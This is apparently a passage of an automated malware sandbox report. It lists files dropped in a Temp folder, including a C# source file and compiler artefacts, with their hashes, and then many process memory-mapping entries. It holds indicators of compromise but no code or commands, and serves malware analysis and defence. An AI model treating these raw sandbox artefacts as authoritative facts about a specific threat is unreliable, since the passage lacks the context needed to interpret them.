                                                                          ee7828e0ec18dfb5c2c5421a24021ac7fe81bda3dfbc288bd9a9043da41129ab4b1723f3dac58da79ab0c1d18f12947456944b1089679999cd6a16da62619f60

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\CSCA3E45F721DCC41A99BA936F9208D8B74.TMP

                                                                          Filesize

                                                                          652B

                                                                          MD5

                                                                          488518a0854dc8d2129d0e1623a37a6a

                                                                          SHA1

                                                                          f5f381735a11d7b572f0f8617afc5ad69cef2cdd

                                                                          SHA256

                                                                          babfdb1d940c0addee61aab483cf71ac5fead11352ae8baa0d980a3bdca8585c

                                                                          SHA512

                                                                          105f4f8ef0aa23ec4d6292f12f925563def203ad669aed110cda635903d721cf05ab39bd6a8d727c602d86ee515c79fe231ae46a5fd827228136f72889a6f329

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.0.cs

                                                                          Filesize

                                                                          410B

                                                                          MD5

                                                                          9a10482acb9e6952b96f4efc24d9d783

                                                                          SHA1

                                                                          5cfc9bf668351df25fcda98c3c2d0bb056c026c3

                                                                          SHA256

                                                                          a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

                                                                          SHA512

                                                                          e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\qpvas05h\qpvas05h.cmdline

                                                                          Filesize

                                                                          369B

                                                                          MD5

                                                                          6c9aa04fb876e079685966d995bdb398

                                                                          SHA1

                                                                          5e75d849b04c782604dd2f7e8a7d61c590ad2fe7

                                                                          SHA256

                                                                          9069a1f3043fd0eda2817ba12d85a529e4455af44d411f02bb131451bc50dce8

                                                                          SHA512

                                                                          1161df029aaa506f94b45c1527d031361c189ad1bc3ca899bfcabd016aef5052dbedab3db0b2cd9c74dc90df0dd3c7e92f90df46d8b4695df9371f732fe9987b

                                                                        • memory/396-202-0x0000000000000000-mapping.dmp

                                                                        • memory/856-234-0x0000000000000000-mapping.dmp

                                                                        • memory/1028-181-0x000000000A1C0000-0x000000000A2FA000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1028-165-0x0000000007ED0000-0x0000000007F73000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/1028-190-0x0000000007ED0000-0x0000000007F73000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/1028-175-0x0000000008BB0000-0x0000000008CEB000-memory.dmp

                                                                          Filesize

                                                                          1.2MB

                                                                        • memory/1160-231-0x0000000000000000-mapping.dmp

                                                                        • memory/1208-204-0x0000000000000000-mapping.dmp

                                                                        • memory/1224-185-0x0000000000000000-mapping.dmp

                                                                        • memory/1272-205-0x0000000000000000-mapping.dmp

                                                                        • memory/1308-191-0x0000000000000000-mapping.dmp

                                                                        • memory/1448-193-0x0000000000000000-mapping.dmp

                                                                        • memory/1520-159-0x00007FFE0C4A0000-0x00007FFE0CF61000-memory.dmp

                                                                          Filesize

                                                                          10.8MB

                                                                        • memory/1520-161-0x0000022E60AA0000-0x0000022E60ADD000-memory.dmp

                                                                          Filesize

                                                                          244KB

                                                                        • memory/1520-142-0x0000000000000000-mapping.dmp

                                                                        • memory/1520-144-0x00007FFE0C4A0000-0x00007FFE0CF61000-memory.dmp

                                                                          Filesize

                                                                          10.8MB

                                                                        • memory/1520-143-0x0000022E60900000-0x0000022E60922000-memory.dmp

                                                                          Filesize

                                                                          136KB

                                                                        • memory/1716-133-0x0000000010000000-0x000000001000E000-memory.dmp

                                                                          Filesize

                                                                          56KB

                                                                        • memory/1716-138-0x0000000001F70000-0x0000000001F7D000-memory.dmp

                                                                          Filesize

                                                                          52KB

                                                                        • memory/1716-132-0x0000000000000000-mapping.dmp

                                                                        • memory/1956-209-0x0000000000000000-mapping.dmp

                                                                        • memory/2076-217-0x0000000000000000-mapping.dmp

                                                                        • memory/2136-195-0x0000000000000000-mapping.dmp

                                                                        • memory/2348-187-0x0000000000000000-mapping.dmp

                                                                        • memory/2588-233-0x0000000000000000-mapping.dmp

                                                                        • memory/2812-229-0x0000000000000000-mapping.dmp

                                                                        • memory/2812-145-0x0000000000000000-mapping.dmp

                                                                        • memory/3084-174-0x0000000000000000-mapping.dmp

                                                                        • memory/3116-199-0x0000000000000000-mapping.dmp

                                                                        • memory/3164-214-0x0000000000000000-mapping.dmp

                                                                        • memory/3240-180-0x0000000000EC0000-0x0000000000F56000-memory.dmp

                                                                          Filesize

                                                                          600KB

                                                                        • memory/3240-177-0x00000000006C6B20-0x00000000006C6B24-memory.dmp

                                                                          Filesize

                                                                          4B

                                                                        • memory/3240-173-0x0000000000000000-mapping.dmp

                                                                        • memory/3256-170-0x0000018E06840000-0x0000018E068E3000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/3272-230-0x0000000000000000-mapping.dmp

                                                                        • memory/3428-215-0x0000000000000000-mapping.dmp

                                                                        • memory/3520-164-0x0000017C89D30000-0x0000017C89DD3000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/3588-197-0x0000000000000000-mapping.dmp

                                                                        • memory/3632-221-0x0000000000000000-mapping.dmp

                                                                        • memory/3636-219-0x0000000000000000-mapping.dmp

                                                                        • memory/3636-189-0x0000000000000000-mapping.dmp

                                                                        • memory/3684-148-0x0000000000000000-mapping.dmp

                                                                        • memory/3736-152-0x0000000000000000-mapping.dmp

                                                                        • memory/3756-196-0x0000000000000000-mapping.dmp

                                                                        • memory/3784-166-0x0000020E84B50000-0x0000020E84BF3000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/3960-225-0x0000000000000000-mapping.dmp

                                                                        • memory/4012-172-0x0000000000000000-mapping.dmp

                                                                        • memory/4028-169-0x0000000000060000-0x0000000000103000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/4028-160-0x0000000000000000-mapping.dmp

                                                                        • memory/4028-163-0x0000000000060000-0x0000000000103000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/4164-155-0x0000000000000000-mapping.dmp

                                                                        • memory/4196-171-0x0000000000000000-mapping.dmp

                                                                        • memory/4244-162-0x0000000000000000-mapping.dmp

                                                                        • memory/4244-168-0x0000022E4AFD0000-0x0000022E4B073000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/4304-220-0x0000000000000000-mapping.dmp

                                                                        • memory/4352-235-0x0000000000000000-mapping.dmp

                                                                        • memory/4452-237-0x0000000000000000-mapping.dmp

                                                                        • memory/4508-227-0x0000000000000000-mapping.dmp

                                                                        • memory/4552-226-0x0000000000000000-mapping.dmp

                                                                        • memory/4560-210-0x0000000000000000-mapping.dmp

                                                                        • memory/4816-167-0x0000019B45E20000-0x0000019B45EC3000-memory.dmp

                                                                          Filesize

                                                                          652KB

                                                                        • memory/4924-200-0x0000000000000000-mapping.dmp

                                                                        • memory/4992-223-0x0000000000000000-mapping.dmp

                                                                        • memory/5004-207-0x0000000000000000-mapping.dmp

                                                                        • memory/5076-212-0x0000000000000000-mapping.dmp